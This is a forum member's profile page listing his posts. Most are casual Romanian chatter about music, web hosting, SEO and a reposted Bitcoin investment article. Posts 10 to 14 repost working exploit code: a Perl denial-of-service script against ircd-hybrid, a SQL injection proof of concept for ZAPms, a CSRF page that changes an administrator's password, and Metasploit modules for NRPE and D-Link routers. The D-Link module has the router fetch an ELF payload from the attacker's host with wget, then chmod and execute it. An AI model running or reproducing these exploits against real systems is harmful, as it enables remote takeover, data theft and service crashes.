Jump to content

Gonzalez

Active Members
  • Posts

    1576
  • Joined

  • Last visited

  • Days Won

    9

Everything posted by Gonzalez

  1. Gonzalez

    Salut!

    Salut Mihai! Welcome to RST! -Gonzalez
  2. Metallica - Seek And Destroy.mp3 -Gonzalez
  3. De ce sa trimita Voyo password reset mail? lol -Gonzalez
  4. Ozzy Osbourne - Dreamer.mp3 -Gonzalez
  5. Gonzalez

    Omg!

    OMG! -Gonzalez
  6. Cum instalez rtmp in system32, am pus 3 variante si tot nu merge nimic. A little help please. -Gonzalez
  7. Buna, As dori sa stiu mai multe despre web hosting. Daca ma puteti ajuta ar fi foarte bine. Vreau sa intru in afacerea asta pentru ca poate aduce un profit semnificativ. Stiu ca e competitie pe aceasta nisa, dar merita sa incerc, deoarece am cunostintele necesare pentru a administra serverul si a ajunge pe prima pagina in Google. La inceput voi folosti un cont reseller, iar pe urma cand voi avea destui clienti voi cumpara un dedicated server tot de la HostGator. Am cumparat un reseller de la HostGator si domeniul de la namecheap. Momentan lucrez la site sa-l imbunatatesc cu anumite functii. E HTML, dar voi adauga un blog (Wordpress) in curand. De partea de SEO ma ocup eu, dar nu vreau inca sa incep SEO pentru ca site-ul nu e finalizat inca. Am doar cateva backlink-uri. Un prieten mi-a spus sa fac PFA si nu firma, pentru ca e mai ieftin. Voi ce zice-ti? Astept sfaturile voastre, daca aveti. -Gonzalez
  8. LiveJasmin sau Chatturbate. -Gonzalez
  9. 150 euro pe prima pagina. E mica competitia pentru cuvintele cheie alese de tine. -Gonzalez
  10. #!/usr/bin/perl # ircd-hybrid remote denial of service exploit for CVE-2013-0238 # quick and dirty h4x by kingcope # tested against ircd-hybrid-8.0.5 centos6 # please modify below in case of buggy code. # enjoy! use Socket; srand(time()); $exploiting_nick = "hybExpl" . int(rand(10000)); sub connecttoserver() { $bool = "yes"; $iaddr = inet_aton($ircserver) || die("Failed to find host: $ircserver"); $paddr = sockaddr_in($ircport, $iaddr); $proto = getprotobyname('tcp'); socket(SOCK1, PF_INET, SOCK_STREAM, $proto) || die("Failed to open socket:$!"); connect(SOCK1, $paddr) || {$bool = "no"}; } sub usage() { print "usage: ircd-hybrid.pl <target> <port>\r\n"; exit; } $| = 1; print "----------------------------------------------------------------------\r\nLets have fun!\r\n"; print "----------------------------------------------------------------------\r\n"; if (!defined($ARGV[1])) { usage(); } $ircport = $ARGV[1]; $ircserver = $ARGV[0]; print "Connecting to $ircserver on port $ircport...\n"; connecttoserver(); if ($bool eq "no") { print "Connection refused.\r\n"; exit(0); } send(SOCK1,"NICK $exploiting_nick\r\n",0); send(SOCK1,"USER $exploiting_nick \"yahoo.com\" \"eu.hax.net\" :$exploiting_nick\r\n",0); while (<SOCK1>) { $line = $_; print $line; if ((index $line, " 005 ") ne -1) { goto logged_in; } if ((index $line, "PING") ne -1) { substr($line,1,1,"O"); send(SOCK1, $line, 0); } } logged_in: print " ok\r\n"; print "Sending buffers...\r\n"; $channelr = int(rand(10000)); send(SOCK1, "JOIN #h4xchan$channelr\r\n", 0); sleep(1); $k = 0; do { print $_; $k++; $crashnum = -1000009 - $k * 1000; send(SOCK1, "MODE #h4xchan$channelr +b *!*\@127.0.0.1/$crashnum\r\n", 0); } while(<SOCK1>); print "done\r\n"; # EOF
  11. ============================================================================================================= [o] ZAPms <= SQL Injection Vulnerability Software : ZAPms Version : 1.41 Vendor : http://www.zapms.de Author : NoGe Contact : noge[dot]code[at]gmail[dot]com Desc : ZAPms is free open source web content management system, adapted to the needs of businesses on the Internet. The ZAPms offers many features and modules as well as an expansion interface for maximum capabilities. ============================================================================================================= [o] Exploit http://localhost/[path]/products?pid=[SQLi] ============================================================================================================= [o] PoC http://server/products?pid=-14+union+select+1,2,3,4,5,6,7,8,9,version(),database(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,user(),43,44,45,46,47,48--&cid=0&tid=&page=&action=details&subaction=product ============================================================================================================= [o] Greetz Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory aJe kaka11 matthews wishnusakti inc0mp13te martfella pizzyroot Genex H312Y noname tukulesto }^-^{ ============================================================================================================= [o] April 09 2013 - Papua, Indonesia
  12. ========================================================================================== # Title : Free Monthly Websites 2.0 Administrator Remote Password Change # Date : 10/04/2013 # Name : Free Monthly Websites # Affected Version : 2.0 # Vendor : http://www.freemonthlywebsites2.com/ # Category : Web applications # Severity : High # Tested on : Firefox | Google Chrome | Internet Explorer # Dorks : inurl:/index_ebay.php | "Powered by: Resell Rights Fortune" | Powered By: Free Monthly Websites 2.0 # About the software : Free Monthly Websites 2.0 is here and you no longer have to worry about editing complicated HTML code as we have taken care of that for you, and you no longer have to worry about anything to do with website design as we have taken care of that for you too, adding your Google AdSense Publisher code, taken care of, ClickBank! All done for you, here's how it works. (taken from the vendor's page) ========================================================================================== # Author : Yassin Aboukir # Contact : Yaaboukir [At] Gmail [Dot] com # Site : www.y-aboukir.info # Greetz : To All Ethical Hackers! ========================================================================================== # Proof of concept : Vulnerable page : http://target.com/[path]/admin/file_io.php <form name="frm" action="file_io.php" method="post" onSubmit="return chk()"> <input type="hidden" name="do_type" value="admin_settings_write"> # How to exploit : - Change http://www.target.com/[path]/ to the link of target website. <html> <head><title>Free Monthly Websites 2.0 | Remote Admin password Change</title></head> <body> <td width="645" align="center" valign="top"><table width="645" border="0" align="center" cellpadding="0" cellspacing="0"> <form name="frm" action="http://www.target.com/[path]/admin/file_io.php" method="post" onSubmit="return chk()"> <input type="hidden" name="do_type" value="admin_settings_write"> <tr> <td height="100" colspan="2" align="center" valign="middle"> <font color="#808080"><b><font size="5">Free Monthly Websites 2.0 |</font><font size="6"> </font></b> <font size="4">Remote Admin password Change</font></font></td> </tr> <tr> <td width="300" height="50" align="center" valign="middle"> <font color="#808080">New Username:</font> </td> <td width="345" height="50" align="left" valign="middle"><input name="user_name" type="text" size="40"> </td> </tr> </td> <tr> <td width="300" height="62" align="center" valign="middle"> <font color="#808080">New Password: </font> </td> <td width="345" height="62" align="left" valign="middle"><input name="password" type="text" size="40"> </td> </tr> <tr> <td height="50" colspan="2" align="center" valign="middle" ><p> <input type="submit" name="Submit" value="Save" style="font-weight: 700"><br> </td> </tr> <tr> <td height="50" colspan="2" align="center" valign="middle" class="main2"><p>Author<b> : </b> <a href="http://www.y-aboukir.info/" style="text-decoration: none"> <font color="#000000">Yassin ABOUKIR</font></a></p></td> </tr> </body> <html>
  13. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## # require 'msf/core' require 'zlib' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution', 'Description' => %q{ The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands. }, 'Author' => [ 'Rudolph Pereir', # Vulnerability discovery 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module ], 'References' => [ [ 'CVE', '2013-1362' ], [ 'OSVDB', '90582'], [ 'BID', '58142'], [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability'] ], 'License' => MSF_LICENSE, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Payload' => { 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'perl python ruby bash telnet', # *_perl, *_python and *_ruby work if they are installed } }, 'Targets' => [ [ 'Nagios Remote Plugin Executor prior to 2.14', {} ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 21 2013' )) register_options( [ Opt::RPORT(5666), OptEnum.new('NRPECMD', [ true, "NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg", 'check_procs', ['check_procs', 'check_users', 'check_load', 'check_disk'] ]), # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below OptBool.new('NRPESSL', [ true, "Use NRPE's Anonymous-Diffie-Hellman-variant SSL ", true]) ], self.class) end def send_message(message) packet = [ 2, # packet version 1, # packet type, 1 => query packet 0, # checksum, to be added later 0, # result code, discarded for query packet message, # the command and arguments 0 # padding ] packet[2] = Zlib::crc32(packet.pack("nnNna1024n")) # calculate the checksum begin self.sock.put(packet.pack("nnNna1024n")) #send the packet res = self.sock.get_once # get the response rescue ::EOFError => eof res = "" end return res.unpack("nnNnA1024n")[4] unless res.nil? end def setup @ssl_socket = nil @force_ssl = false super end def exploit if check != Exploit::CheckCode::Vulnerable fail_with(Exploit::Failure::NotFound, "Host does not support plugin command line arguments or is not accepting connections") end stage = "setsid nohup #{payload.encoded} & " stage = Rex::Text.encode_base64(stage) # NRPE will reject queries containing |`&><'\"\\[]{}; but not $() command = datastore['NRPECMD'] command << "!" command << "$($(rm -f /tmp/$$)" # Delete the file if it exists # need a way to write to a file without using redirection (>) # cant count on perl being on all linux hosts, use GNU Sed # TODO: Probably a better way to do this, some hosts may not have a /tmp command << "$(cp -f /etc/passwd /tmp/$$)" # populate the file with at least one line of text command << "$(sed 1i#{stage} -i /tmp/$$)" # prepend our stage to the file command << "$(sed q -i /tmp/$$)" # delete the rest of the lines after our stage command << "$(eval $(base64 -d /tmp/$$) )" # decode and execute our stage, base64 is in coreutils right? command << "$(kill -9 $$)" # kill check_procs parent (popen'd sh) so that it never executes command << "$(rm -f /tmp/$$))" # clean the file with the stage connect print_status("Sending request...") send_message(command) disconnect end def check print_status("Checking if remote NRPE supports command line arguments") begin # send query asking to run "fake_check" command with command substitution in arguments connect res = send_message("__fake_check!$()") # if nrpe is configured to support arguments and is not patched to add $() to # NASTY_META_CHARS then the service will return: # NRPE: Command '__fake_check' not defined if res =~ /not defined/ return Exploit::CheckCode::Vulnerable end # Otherwise the service will close the connection if it is configured to disable arguments rescue EOFError => eof return Exploit::CheckCode::Safe rescue Errno::ECONNRESET => reset unless datastore['NRPESSL'] or @force_ssl print_status("Retrying with ADH SSL") @force_ssl = true retry end return Exploit::CheckCode::Safe rescue => e return Exploit::CheckCode::Unknown end # TODO: patched version appears to go here return Exploit::CheckCode::Unknown end # NRPE uses unauthenticated Annonymous-Diffie-Hellman # setting the global SSL => true will break as we would be overlaying # an SSLSocket on another SSLSocket which hasnt completed its handshake def connect(global = true, opts={}) self.sock = super(global, opts) if datastore['NRPESSL'] or @force_ssl ctx = OpenSSL::SSL::SSLContext.new("TLSv1") ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE ctx.ciphers = "ADH" @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx) @ssl_socket.connect self.sock.extend(Rex::Socket::SslTcp) self.sock.sslsock = @ssl_socket self.sock.sslctx = ctx end return self.sock end def disconnect @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl super end end
  14. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'DLink DIR-645 / DIR-815 diagnostic.php Command Execution', 'Description' => %q{ Some DLink Routers are vulnerable to OS Command injection in the web interface. On DIR-645 versions prior 1.03 authentication isn't needed to exploit it. On version 1.03 authentication is needed in order to trigger the vulnerability, which has been fixed definitely on version 1.04. Other DLink products, like DIR-300 rev B and DIR-600, are also affected by this vulnerability. Not every device includes wget which we need for deploying our payload. On such devices you could use the cmd generic payload and try to start telnetd or execute other commands. Since it is a blind os command injection vulnerability, there is no output for the executed command when using the cmd generic payload. A ping command against a controlled system could be used for testing purposes. This module has been tested successfully on DIR-645 prior to 1.03, where authentication isn't needed in order to exploit the vulnerability. }, 'Author' => [ 'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module 'juan vazquez' # minor help with msf module ], 'License' => MSF_LICENSE, 'References' => [ [ 'OSVDB', '92144' ], [ 'BID', '58938' ], [ 'EDB', '24926' ], [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-017' ] ], 'DisclosureDate' => 'Mar 05 2013', 'Privileged' => true, 'Platform' => ['linux','unix'], 'Payload' => { 'DisableNops' => true }, 'Targets' => [ [ 'CMD', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ], [ 'Linux mipsel Payload', { 'Arch' => ARCH_MIPSLE, 'Platform' => 'linux' } ], ], 'DefaultTarget' => 1 )) register_options( [ OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]), OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]), OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60]) ], self.class) end def request(cmd,uri) begin res = send_request_cgi({ 'uri' => uri, 'method' => 'POST', 'vars_post' => { "act" => "ping", "dst" => "` #{cmd}`" } }) return res rescue ::Rex::ConnectionError vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") return nil end end def exploit downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8)) uri = '/diagnostic.php' if target.name =~ /CMD/ if not (datastore['CMD']) fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible") end cmd = payload.encoded res = request(cmd,uri) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state") return end #thx to Juan for his awesome work on the mipsel elf support @pl = generate_payload_exe @elf_sent = false # # start our server # resource_uri = '/' + downfile if (datastore['DOWNHOST']) service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri else #do not use SSL if datastore['SSL'] ssl_restore = true datastore['SSL'] = false end #we use SRVHOST as download IP for the coming wget command. #SRVHOST needs a real IP address of our download host if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::") srv_host = Rex::Socket.source_address(rhost) else srv_host = datastore['SRVHOST'] end service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...") start_service({'Uri' => { 'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) }, 'Path' => resource_uri }}) datastore['SSL'] = true if ssl_restore end # # download payload # print_status("#{rhost}:#{rport} - Asking the DLink device to download #{service_url}") #this filename is used to store the payload on the device filename = rand_text_alpha_lower(8) #not working if we send all command together -> lets take three requests cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}" res = request(cmd,uri) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload") end # wait for payload download if (datastore['DOWNHOST']) print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the Dlink device to download the payload") select(nil, nil, nil, datastore['HTTP_DELAY']) else wait_linux_payload end register_file_for_cleanup("/tmp/#{filename}") # # chmod # cmd = "chmod 777 /tmp/#{filename}" print_status("#{rhost}:#{rport} - Asking the Dlink device to chmod #{downfile}") res = request(cmd,uri) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload") end # # execute # cmd = "/tmp/#{filename}" print_status("#{rhost}:#{rport} - Asking the Dlink device to execute #{downfile}") res = request(cmd,uri) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload") end end # Handle incoming requests from the server def on_request_uri(cli, request) #print_status("on_request_uri called: #{request.inspect}") if (not @pl) print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!") return end print_status("#{rhost}:#{rport} - Sending the payload to the server...") @elf_sent = true send_response(cli, @pl) end # wait for the data to be sent def wait_linux_payload print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...") waited = 0 while (not @elf_sent) select(nil, nil, nil, 1) waited += 1 if (waited > datastore['HTTP_DELAY']) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?") end end end end
  15. If you had invested $1,000 in Bitcoin just two months ago and sold it yesterday, you would have made about $9,000 in profit. Once reserved to the darkest corners of the Internet, Bitcoin is a digital crypto-currency that’s quickly gaining favor internationally, due in part to attention on Cyprus’s banking emergency, its inclusion in the American financial regulatory framework, and increasing press coverage. After a post-hack decline of about 20 percent, Bitcoin has rallied, again. Earlier this week, it hit yet another all-time high of just under $195. Is it too late to clamber onto the bandwagon, roll around in the filthy lucre, and come out smelling like roses and mixing your metaphors profitably? We asked a trio of Bitcoin’s major players if people should still invest and if so, why: Roger Vers, investor in a dozen Bitcoin startups; Adam Draper, founder of BoostVC; and Charlie Shrem, CEO of BitInstant and vice chair of the Bitcoin Foundation. They all believe there is still money to be made. Here’s why. 1) Increase is based in large part on press coverage, which hasn’t peaked. RELATED STORIES How to get and spend Bitcoin, the booming digital currency The complete history of Bitcoin—the revolutionary currency Why a patent suit won't be the end of Bitcoin The press-fueled buzz will end, and when it does there will be a “major downward correction,” according to Ver. But that won’t happen today. 2) Medium and long-term prospects are very good. After the Bitcoin market corrects, the value of the currency’s exchange will eventually pass that decline. If you’re investing for the long run, Bitcoin may remain a good bet. 3) Gold, solid gold! If Bitcoin does act like gold—as an investable asset as much as a currency—then the market value has the potential of moving into the trillions, according to Draper. Bitcoin market cap currently stands at about $2 billion. 4) Regardless of value, Bitcoin remains independent. Bitcoins remain largely independent of governments and financial institutions. If you value retaining that independence when it comes to your wealth, Bitcoin will allow that to happen regardless of its worth as an investment vehicle. The creation of a Bitcoin bank and the issuance of U.S. financial regulations have introduced some doubt as to whether governments will remain disconnected from Bitcoin in the long run, but even if they make a run at it, its cryptological nature means it will be very difficult to tame. 5) Its economy is growing. The economy around Bitcoin is growing. The amount of bitcoins spent on legal goods and services have recently passed the underground economy the currency was initially famous for. Bitcoin payment processor BitPay announced it handled $5.2 million of transactions last month and added 1,300 new merchants. ... Shrem cautions, regardless of the reasons that exist for buying, that you can’t expect gains without accepting the risks that justify them. If, as some believe, the currency will rise as high as $400, anyone aiming at that high-point risks a painful dive. “It's very risky!” cautions Shrem. “Don’t put in money you cannot afford to lose!”
  16. http://www.gaaks.com/?s=ClassiPress -Gonzalez
  17. Nu te supara, dar ce poti face cu o tableta? La ce te ajuta? Nu vreau sa par un om rau daca intreb asta. -Gonzalez
  18. Gonzalez

    Salut!

    Bun venit Laurentiu! -Gonzalez
  19. Cauta pe blog-uri (google search) tutoriale despre on page optimization. Uite aici unul mai avansat, sper sa te ajute cu ceva: http://www.quicksprout.com/the-advanced-guide-to-seo-chapter-1/ Sunt mai multe capitole acolo. Poti sa incerci linistit ca nu dauneaza la site! -Gonzalez
  20. Uite aici: wjunction.com E plin de uploaderi acolo si cica e Webmaster Forum, vei gasi informatii utile despre programele care te intereseaza. -Gonzalez
  21. Metallica - Ride The Lightning.mp3 -Gonzalez
×
×
  • Create New...